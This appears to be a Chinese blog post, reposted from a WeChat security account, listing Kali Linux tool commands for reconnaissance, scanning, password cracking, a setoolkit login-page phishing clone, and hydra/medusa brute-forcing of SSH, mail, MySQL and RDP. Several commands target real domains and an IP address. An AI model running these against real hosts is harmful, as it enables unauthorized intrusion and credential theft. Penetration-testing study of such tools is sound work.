今天就是总结一些比较实用的小工具,对于我们日常的一些操作非常实用,这里不配图了,大家耐心点看文字吧。
//域名信息搜集
fierce --domain baidu.com 子域名搜集snmpcheck -t 192.168.119.1 探测一部分的域名dmitry --wnpb wangehacker.cn 查询网站whois信息(端口等)dnsenum --enum wangehacker.cn 域名信息搜集
//针对端口以及内网存活主机探测
nping -tcp -p 22 -data AF56A43D wangehacker.cn 向端口发送指定消息-l 探测内网主机netdiscover -i eth0 基于网卡监听存活主机masscan -p 1-65525 101.43.1.181 --rate=100 扫描指定端口,设置100线程
//字典以及彩虹表
crunch 2 4 0123456789adc -o /root/pass.txt 生成2到4位的包含1234567890adc这些字符的密码存到root下rtgen md5 loweralpha 1 5 0 1000 1000 0 用彩虹表生成md5字母规则的1-5位密码表cat /usr/share/rainbowcrack/charset.txt 查看彩虹表的生成规则
//指纹识别
whatweb wangehacker.cn 网站指纹识别joomscan --url wangehacker.cn 查看网站服务器的信息,包含一些敏感目录
//waf识别
wafw00f http://www.gzfczs.com
//网站结构扫描
nikto -h http://www.gzfczs.com -o /root/out.txt
//社工钓鱼
setoolkit 选择1->2->3->2(选择一个登录的站点克隆输入监听的主机IP和需要克隆的网站页面)
//破解服务密码
medusa -M ssh -h 101.43.1.181 -e ns -F -U root.txt -P xxxx.txthydra -L root.txt -P mima.txt -t 10 -vV -e ns 101.43.1.181 ssh -o save.log -t线程 -e ns尝试空密码和指定用户名和密码 -vV显示详细过程hydra -l user -P /usr/share/wordlists/fasttrack.txt ip -s 55007 pop3 破解邮箱hydra -l user -P 1.txt -e ns ip地址 mysqlhydra ip地址 rdp -l admin -P pass.txt -V
//破解zip压缩包
fcrackzip -b -c1 -l 1-4 -u b.zip -v -c密码类型,跟1是0-9,a是所有小写字母,A是所有大写字母,!是所有特殊字符 原文始发于微信公众号(白安全组):总结一些kali中实用的小工具
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论